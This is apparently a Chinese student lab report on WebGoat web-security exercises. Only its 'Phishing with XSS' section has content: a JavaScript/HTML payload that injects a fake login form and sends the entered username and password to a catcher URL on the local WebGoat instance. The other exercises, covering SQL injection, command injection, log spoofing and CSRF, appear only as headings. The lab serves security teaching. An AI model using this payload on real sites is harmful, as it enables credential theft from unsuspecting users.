其他分享
首页 > 其他分享> > 2018-2019-2 网络对抗技术 20165237 Exp9 Web安全基础实践

2018-2019-2 网络对抗技术 20165237 Exp9 Web安全基础实践

作者:互联网

2018-2019-2 网络对抗技术 20165237 Exp9 Web安全基础实践


实验问题


执行java -jar webgoat-container-7.0.1-war-exec.jar开启webgoat

Exp 9.1 Phishing with XSS

</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

Exp 9.2 数字型盲注入和字符串盲型注入


Exp 9.3 Command Injection


Exp 9.4 Numeric SQL Injection


Exp 9.5 Log Spoofing


Exp 9.6 Numeric SQL Injection


Exp 9.7 SQL 注入


Exp 9.8 Cross Site Request Forgery


实验感想

标签:Web,Exp9,用户名,XSS,2019,Exp,SQL,原理,页面
来源: https://www.cnblogs.com/Miss-moon/p/10927217.html